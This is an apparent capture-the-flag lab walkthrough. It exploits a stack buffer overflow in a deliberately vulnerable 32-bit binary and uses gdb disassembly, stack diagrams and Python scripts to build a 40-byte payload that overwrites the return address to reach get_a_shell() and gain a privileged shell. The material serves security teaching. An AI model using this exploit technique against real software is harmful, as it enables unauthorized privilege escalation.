========== bof-level2 ==========

Let's open the binary program using gdb, and let's also open the source code,
and list them side by side.

gdb-peda$ disas receive_input
Dump of assembler code for function receive_input:

void receive_input() {

### FUNCTION PROLOGUE ###
   0x08048570 <+0>:     push   %ebp
   0x08048571 <+1>:     mov    %esp,%ebp
   0x08048573 <+3>:     push   %esi
   0x08048574 <+4>:     sub    $0x54,%esp
### FUNCTION PROLOGUE ENDS ###

    int a = 0x41414141, b = 0x42424242;
    char buf[20];

   0x08048577 <+7>:     lea    0x8048737,%eax
   0x0804857d <+13>:    movl   $0x41414141,-0x8(%ebp)
   0x08048584 <+20>:    movl   $0x42424242,-0xc(%ebp)
-> seems a is at -0x8(%ebp), and b is at -0xc(%ebp).

   0x0804858b <+27>:    mov    -0x8(%ebp),%ecx
   0x0804858e <+30>:    mov    -0xc(%ebp),%edx
   0x08048591 <+33>:    mov    %eax,(%esp)
   0x08048594 <+36>:    mov    %ecx,0x4(%esp)
   0x08048598 <+40>:    mov    %edx,0x8(%esp)
   0x0804859c <+44>:    call   0x8048370
-> printf("Your variables are: a = 0x%08x b = 0x%08x\n", a, b);

   0x080485a1 <+49>:    lea    0x8048762,%ecx
   0x080485a7 <+55>:    mov    %ecx,(%esp)
   0x080485aa <+58>:    mov    %eax,-0x24(%ebp)
   0x080485ad <+61>:    call   0x8048370
-> printf("Are you happy with such values?\n");

   0x080485b2 <+66>:    lea    0x8048783,%ecx
   0x080485b8 <+72>:    mov    %ecx,(%esp)
   0x080485bb <+75>:    mov    %eax,-0x28(%ebp)
   0x080485be <+78>:    call   0x8048370
-> printf("Type YES if you agree with this... (a fake message)\n");

   0x080485c3 <+83>:    mov    $0x80,%ecx
   0x080485c8 <+88>:    lea    -0x20(%ebp),%edx      <-- this is buf.
   0x080485cb <+91>:    mov    0x804a040,%esi
   0x080485d1 <+97>:    mov    %edx,(%esp)           <-- buf,
   0x080485d4 <+100>:   movl   $0x80,0x4(%esp)
   0x080485dc <+108>:   mov    %esi,0x8(%esp)
   0x080485e0 <+112>:   mov    %eax,-0x2c(%ebp)
   0x080485e3 <+115>:   mov    %ecx,-0x30(%ebp)
   0x080485e6 <+118>:   call   0x8048380
-> fgets(buf, 128, stdin);
   buf is at -0x20(%ebp). Max size is 20, but the function reads 128 bytes
   (BUFFER OVERFLOW HERE!)
   0x080485eb <+123>:   lea    0x80487b8,%ecx
   0x080485f1 <+129>:   mov    -0x8(%ebp),%edx
   0x080485f4 <+132>:   mov    -0xc(%ebp),%esi
   0x080485f7 <+135>:   mov    %ecx,(%esp)
   0x080485fa <+138>:   mov    %edx,0x4(%esp)
   0x080485fe <+142>:   mov    %esi,0x8(%esp)
   0x08048602 <+146>:   mov    %eax,-0x34(%ebp)
   0x08048605 <+149>:   call   0x8048370
-> printf("Now your variables are: a = 0x%08x b = 0x%08x\n", a, b);

   0x0804860a <+154>:   cmpl   $0x48474645,-0x8(%ebp)
   0x08048611 <+161>:   mov    %eax,-0x38(%ebp)
   0x08048614 <+164>:   jne    0x804864e
   0x0804861a <+170>:   cmpl   $0x44434241,-0xc(%ebp)
   0x08048621 <+177>:   jne    0x804864e
-> if(a == 0x48474645 && b == 0x44434241) {

   0x08048627 <+183>:   lea    0x80487e7,%eax
   0x0804862d <+189>:   mov    %eax,(%esp)
   0x08048630 <+192>:   call   0x8048370
-> printf("Great, but I will not execute get_a_shell() for you..\n");

   0x08048635 <+197>:   lea    0x804881e,%ecx
   0x0804863b <+203>:   mov    %ecx,(%esp)
   0x0804863e <+206>:   mov    %eax,-0x3c(%ebp)
   0x08048641 <+209>:   call   0x8048370
-> printf("Run it yourself!\n");

   0x08048646 <+214>:   mov    %eax,-0x40(%ebp)
   0x08048649 <+217>:   jmp    0x804865f

    } else {

   0x0804864e <+222>:   lea    0x8048830,%eax
   0x08048654 <+228>:   mov    %eax,(%esp)
   0x08048657 <+231>:   call   0x8048370
-> printf("Analyze the program!\n");

   0x0804865c <+236>:   mov    %eax,-0x44(%ebp)

    }

### FUNCTION EPILOGUE ###
   0x0804865f <+239>:   add    $0x54,%esp
   0x08048662 <+242>:   pop    %esi
   0x08048663 <+243>:   pop    %ebp
   0x08048664 <+244>:   ret
### FUNCTION EPILOGUE END ###
}

So you can see the assembly lines and the source code side by side.
From fgets(buf, 128, stdin), you can identify that the variable buf is at
-0x20(%ebp), and from:

    int a = 0x41414141, b = 0x42424242;
   0x0804857d <+13>:    movl   $0x41414141,-0x8(%ebp)
   0x08048584 <+20>:    movl   $0x42424242,-0xc(%ebp)

you can identify that the variable a is at -0x8(%ebp) and the variable b is at
-0xc(%ebp).
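As a quick sanity check on those offsets, the following Python sketch computes
how far b and a sit from the start of buf. Only the three %ebp-relative offsets
come from the disassembly; the constant names and the helper bytes_from_buf()
are made up here for illustration.

```python
# %ebp-relative offsets read off the disassembly of receive_input.
# The names below are illustrative only; they do not appear in the binary.
BUF_OFFSET = -0x20  # lea  -0x20(%ebp),%edx          -> buf
B_OFFSET = -0x0c    # movl $0x42424242,-0xc(%ebp)    -> b
A_OFFSET = -0x08    # movl $0x41414141,-0x8(%ebp)    -> a


def bytes_from_buf(offset):
    """Return how many input bytes precede the object stored at `offset`."""
    return offset - BUF_OFFSET


for name, offset in (("b", B_OFFSET), ("a", A_OFFSET)):
    print("%s starts %d bytes after the start of buf"
          % (name, bytes_from_buf(offset)))
```

This prints 20 for b and 24 for a. The 20-byte gap matches the declared size of
buf, so whatever is typed past the 20th character lands in b first, then in a.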
We can draw a stack diagram as follows:

[buf ebp-0x20 (20 bytes, from -0x20 to -0xc)][b ebp-0xc][a ebp-0x8]
\_________________ 20 bytes _________________/\_4 bytes_/\_4 bytes_/

So if you type 12345678901234567890ABCD, the last four characters will
overwrite the variable 'b' as follows:

[        buf       ][_b][_a]
12345678901234567890ABCD

And if you type 12345678901234567890ABCDEFGH, this will overwrite both
variables 'b' and 'a' as follows:

[        buf       ][_b][_a]
12345678901234567890ABCDEFGH

As a result, _b will store ABCD, which is 0x44434241, and _a will store EFGH,
which is 0x48474645.

But even if you have matched the values for the if condition, the program will
not execute get_a_shell(). Let's overwrite the function's return address to run
get_a_shell().

From the slide, we have learned that the saved ebp is stored at 0x0(%ebp) and
the function's return address is stored at 0x4(%ebp).
Let's redraw the current function's stack diagram, including those addresses.

12345678901234567890ABCDEFGH????????XXXX
[   buf ebp-0x20   ][_b][_a][si][bp][ret]
\____ 20 bytes ____/\_4/\_4/\_4/\_4/....

We have buf (20), b (4), a (4), one 4-byte slot holding the saved %esi at
-0x4(%ebp) (4), then the saved %ebp (4), and the return address.
(The numbers in parentheses are the sizes in bytes that each object occupies
in memory.)

To reach the point where the return address is stored, we need to fill
20 + 4 + 4 + 4 + 4 = 36 bytes, and then we can put the return address in the
37th to 40th bytes.

Then, let's get the address of 'get_a_shell()'.
You can easily get it from gdb by running the following commands:

gdb-peda$ print get_a_shell
$1 = {<text variable, no debug info>} 0x8048500 <get_a_shell>
gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x08048330  _init
0x08048370  printf@plt
0x08048380  fgets@plt
0x08048390  getegid@plt
0x080483a0  __libc_start_main@plt
0x080483b0  execl@plt
0x080483c0  setregid@plt
0x080483e0  _start
0x08048420  _dl_relocate_static_pie
0x08048430  __x86.get_pc_thunk.bx
0x08048440  deregister_tm_clones
0x08048480  register_tm_clones
0x080484c0  __do_global_dtors_aux
0x080484f0  frame_dummy
0x08048500  get_a_shell     <-- HERE!
0x08048570  receive_input
0x08048670  main
0x08048690  __libc_csu_init
0x080486f0  __libc_csu_fini
0x080486f4  _fini

So we need to put 0x8048500, but because x86 is little endian, we will put
"\x00\x85\x04\x08" for 0x08048500 (the bytes are 08 04 85 00, written in
reverse order).

                                    v"\x00\x85\x04\x08"
12345678901234567890ABCDEFGH12345678
[   buf ebp-0x20   ][_b][_a][si][bp][ret]
\____ 20 bytes ____/\_4/\_4/\_4/\_4/....

And because we cannot type these characters on a keyboard, we will use Python
to create that string and pass it to the program as follows:

## run.py ##
#!/usr/bin/env python

# 36 filler bytes reach the saved return address; the next 4 bytes are the
# address of get_a_shell (0x08048500) in little-endian order.
# Bytes literals keep this working on both Python 2 and Python 3.
payload = b"1" * 36 + b"\x00\x85\x04\x08"

with open('input.txt', 'wb') as f:
    f.write(payload)
## run.py END ##

By running this program, you will get input.txt.

red9057@blue9057-vm-ctf1 : ~
$ python run.py

red9057@blue9057-vm-ctf1 : ~
$ ls -als input.txt
4 -rw-rw-r-- 1 red9057 red9057 40 Oct  3 12:36 input.txt

Then, we will pass this file as the program's input. How?
We will use a pipe in the shell. On the shell command line, the command

$ A | B

means feeding A's output to B as its input.

So if we run:

$ cat input.txt | /home/labs/week2/bof-level2/bof-level2

then our programmatically generated string will be given as the input of the
program.

red9057@blue9057-vm-ctf1 : ~
$ cat input.txt | /home/labs/week2/bof-level2/bof-level2
Your variables are: a = 0x41414141 b = 0x42424242
Are you happy with such values?
Type YES if you agree with this... (a fake message)
Now your variables are: a = 0x31313131 b = 0x31313131
Analyze the program!
Spawning a privileged shell

Oh, yes. It works.

However, after running get_a_shell(), you might want to run the following
command:

$ cat /home/labs/week2/bof-level2/flag

But you cannot type anything, because the program execution has already
finished. Why? Because cat exits after sending all the data in input.txt, which
closes the pipe and ends the input stream of the target program.

We need to keep the pipe open, and we also need a way to deliver our keyboard
input to the program.

To do that, we will use cat again: if you run 'cat' with no arguments, it
prints back each line you type once you press ENTER.

So the command to run will be:

$ (cat input.txt; cat) | /home/labs/week2/bof-level2/bof-level2

and with this command, we can keep the pipe open for your keystrokes after
delivering all the contents of input.txt.

Let's run it.

red9057@blue9057-vm-ctf1 : ~
$ (cat input.txt; cat) | /home/labs/week2/bof-level2/bof-level2
Your variables are: a = 0x41414141 b = 0x42424242
Are you happy with such values?
Type YES if you agree with this... (a fake message)
Now your variables are: a = 0x31313131 b = 0x31313131
Analyze the program!
Spawning a privileged shell
id
uid=1006(red9057) gid=50202(week2-level2-ok) groups=50202(week2-level2-ok),1006(red9057)

Yes, we got the privilege.
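
The padding length and the byte order worked out above can also be computed
instead of typed by hand. The sketch below is one possible variant of run.py,
not the lab's official solution: the helper name build_payload and the constant
names are hypothetical, while the offsets and the address 0x08048500 are the
values found in gdb above. It relies on struct.pack("<I", ...) from the Python
standard library to produce the 4 little-endian bytes.

```python
import struct

# Values taken from the gdb session above; the names are illustrative only.
BUF_OFFSET = -0x20        # buf starts at -0x20(%ebp)
RET_OFFSET = 0x04         # return address is stored at 0x4(%ebp)
GET_A_SHELL = 0x08048500  # address reported by `print get_a_shell`


def build_payload(target_addr, filler=b"1"):
    """Fill everything from buf up to the return address, then append
    target_addr as a 32-bit little-endian value."""
    padding_len = RET_OFFSET - BUF_OFFSET  # 0x4 - (-0x20) = 36 bytes
    return filler * padding_len + struct.pack("<I", target_addr)


payload = build_payload(GET_A_SHELL)
print(len(payload))   # total payload size in bytes
print(repr(payload))  # filler followed by the packed address
```

The result is the same 40 bytes that run.py writes to input.txt. Deriving the
padding from the two offsets makes it harder to miscount, and struct.pack
avoids reversing the address bytes by hand.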